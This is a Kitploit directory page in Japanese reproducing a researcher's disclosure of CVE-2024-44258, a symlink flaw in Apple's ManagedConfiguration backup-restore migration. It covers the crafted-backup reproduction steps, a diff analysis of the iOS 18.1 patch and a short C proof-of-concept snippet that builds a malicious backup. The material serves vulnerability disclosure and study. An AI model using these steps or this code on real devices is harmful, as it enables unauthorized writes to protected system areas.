Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-44258 — CVE-2024-44258 | Kitploit
ツール/GitHubGitHub/ifpdz/cve-2024-44258
特権昇格iOSセキュリティ脆弱性分析エクスプロイトポストエクスプロイトモバイルセキュリティ
GitHubifpdz/cve-2024-44258

CVE-2024-44258

CVE-2024-44258

リポジトリを見る
8914491年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-44258: ManagedConfigurationフレームワークのシンボリックリンク脆弱性

概要

CVE-2024-44258は、AppleデバイスのManagedConfigurationフレームワークおよびprofiledデーモンにおけるシンボリックリンクの脆弱性を明らかにしています。細工されたバックアップを復元する際、移行プロセスが宛先フォルダがシンボリックリンク(symlink)であるかどうかを検証しないため、制限された領域への不正なファイル移行が発生します。


CVE ID

CVE-2024-44258 がこの問題に割り当てられています。CVEは公開されたセキュリティ脆弱性の一意の識別子です。

  • 影響: 悪意を持って細工されたバックアップファイルを復元すると、保護されたシステムファイルが変更される可能性があります。
  • 説明: 影響を受けるコンポーネントにおけるシンボリックリンクの処理が改善され、この問題に対処しました。

詳細については、Appleの公式サポートページを参照してください:

  • support.apple.com/en-us/121569
  • support.apple.com/en-us/121566
  • support.apple.com/en-us/121563

詳細

影響を受けるコンポーネント:

  • ManagedConfigurationフレームワーク
  • profiledデーモン

影響:

この脆弱性により、攻撃者はバックアップ復元時にシンボリックリンクを利用してフォルダ制限をバイパスし、サンドボックス化された領域や保護された領域にファイルを書き込むことができます。この欠陥は、不正なデータアクセス、権限昇格、または変更された設定に依存する他のサービスの悪用を可能にする可能性があります。


再現手順

  1. 細工されたバックアップを作成

    • 次の場所からシンボリックリンクを作成: /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ をサンドボックス化されたフォルダへ向けて、ドメインを使用:
      root@kitploit:~
      SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles
      
  2. 必要なファイルを追加

    • 次の場所にファイルとフォルダを挿入: /private/var/mobile/Library/ConfigurationProfiles HomeDomainを使用。
  3. 細工されたバックアップを復元

    • バックアップを任意のiPhone、iPod、またはiPadデバイスに復元します。
  4. デバイスを再起動

    • 再起動後、制限された領域の内容を確認します。ファイル/フォルダが以前保護されていた場所に移行されていることがわかります。

期待される結果と実際の結果

  • 期待される結果: /private/var/mobile/Library/ConfigurationProfiles は次の場所に移行される: /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/

  • 実際の結果: 細工されたシンボリックリンクにより、ファイルは機密データや保護されたデータを含む可能性のある制限されたフォルダに移行されます。


エクスプロイトの状況

この脆弱性は数ヶ月にわたって実際に悪用されており、活発に悪用されていることを示しています。


パッチの説明

iOS 18.1 beta5 で、AppleはManagedConfigurationフレームワーク内のシンボリックリンク脆弱性に対処するパッチを導入しました。関数 _MCDestinationPathIsSafeFromSymlinkAttacks が追加され、宛先パスの安全性チェックを行い、制限された領域への不正なファイル移行を防止します。このチェックは、関数 MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error: に特に追加されました。


影響を受ける関数:-[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]

脆弱性の修正は、ManagedConfigurationフレームワーク内でファイル移行を担当する関数 -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:] を変更することで実装されました。パッチの仕組みは次のとおりです:

  • シンボリックリンクチェックの追加 AppleはMCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:の冒頭に_MCDestinationPathIsSafeFromSymlinkAttacksの呼び出しを追加しました。この関数は、宛先パスにシンボリックリンクがないかどうかを確認し、移行操作を実行する前に保護層を追加します。

  • 条件チェック _MCDestinationPathIsSafeFromSymlinkAttacksが宛先パスにシンボリックリンクを検出した場合、移行の進行を防ぎます。この関数はOS_LOG_TYPE_FAULTを使用してフォールトメッセージを記録し、早期に終了してファイル操作を停止します。


コード比較

DiaphoraをIDAで使用し、iOS 18.1 beta4とiOS 18.1 beta5の差分比較を行うと、-[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]関数の変更が明らかになります。以下の画像は、追加されたシンボリックリンクチェックを含む修正コードを示しています。

Patch Comparison


PoC(概念実証)

以下は、脆弱性を悪用するバックアップを作成する方法を示すサンプルコードスニペットです。このコードは、実際の細工されたバックアップファイルを提供せずに、バックアップにシンボリックリンクとファイルを追加するプロセスを概説しています。

root@kitploit:~
unsigned char* plist_data = NULL;
        file_read("/path/to/your/test-outofsandbox.plist", &plist_data, &plist_size); // THIS NEED TO BE CHANGED TO THE FILE PATH

    backup_add_directory(backup, "HomeDomain", "Library/ConfigurationProfiles", 0755, 501, 501);
    backup_add_file_with_data(backup, "HomeDomain", "Library/ConfigurationProfiles/test.plist", 0755, 501, 501, 4, plist_data, plist_size); // WE ADD OUR FILES
         
    backup_add_directory(backup, "SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles", NULL, 0755, 501, 501);
    backup_add_symlink(backup, "SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles", "Library", "/private/var/mobile/Library", 501, 501); // CHANGE THE PATH TO THE SANDBOXED FOLDER YOU WANT TO WRITE IN YOUR FILES
    
    backup_write_mbdb(backup); // SAVE THE BACKUP
    backup_free(backup);

開示のタイムライン

  • Appleへの最初の報告: [06/07/2024]
  • CVE割り当て: CVE-2024-44258
  • 公開開示: [02/11/2024]

謝辞

迅速な対応と協力をいただいたAppleのセキュリティチームに感謝します。

脆弱性はHichem MaloufiおよびChristian Minaによって発見されました。


ライセンス

このリポジトリはMITライセンスの下で提供されています。詳細についてはLICENSEを参照してください。

ツールをダウンロード